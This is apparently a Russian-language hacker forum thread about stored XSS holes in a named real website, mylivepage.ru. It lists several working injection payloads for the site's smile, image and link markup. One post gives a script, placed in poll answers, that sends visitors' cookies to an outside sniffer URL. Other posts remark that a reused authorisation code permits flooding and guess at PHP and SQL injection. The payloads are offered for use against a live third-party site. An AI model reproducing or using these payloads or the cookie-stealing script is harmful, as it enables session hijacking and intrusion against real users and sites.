mylivepage.ru/ активные XSS в форуме, комментариях, личных сообщениях и везде где можно оставить своё сообщение. Нет фильтрации `"` применив дополнительные динамические параметры тэга img експлуатируем XSS: [[Smile:"dynsrc="javascript:alert()]] [[Smile:"lowsrc="javascript:alert()]] [[Smile:"style="javascript:alert()]] [[Image:"lowsrc="javascript:alert()]] [[Image:"style="javascript:alert()]] [[Image:"dynsrc="javascript:alert()]] [[http://qwe.ru"style="background:url(javascript:alert())]]
ггг совсем забыл про ещё один параметр onerror= помойму=))) короче пипец= мне кажеться хсс самое малое чт отам есть....наверняка там пхп инъекций куча! и скуль тоже.
там ещё в Опросе есть .... в вариантах ответа пишем.. Code: <script>img = new Image(); img.src = "http://site.ru/ваш СниФ.jpg?"+document.cookie;</script> и куки у нас....
Да этот mylivepage.ru даже id сессии не сохраняет и код авторизации всегда один и тот же можно использовать - можно зафлудить по самое не могу. Правда, слово "<script>" фильтруется полным удалием. Даже <scr<script>ipt> не помогает. Так что че-то затруднился с угоном печенья
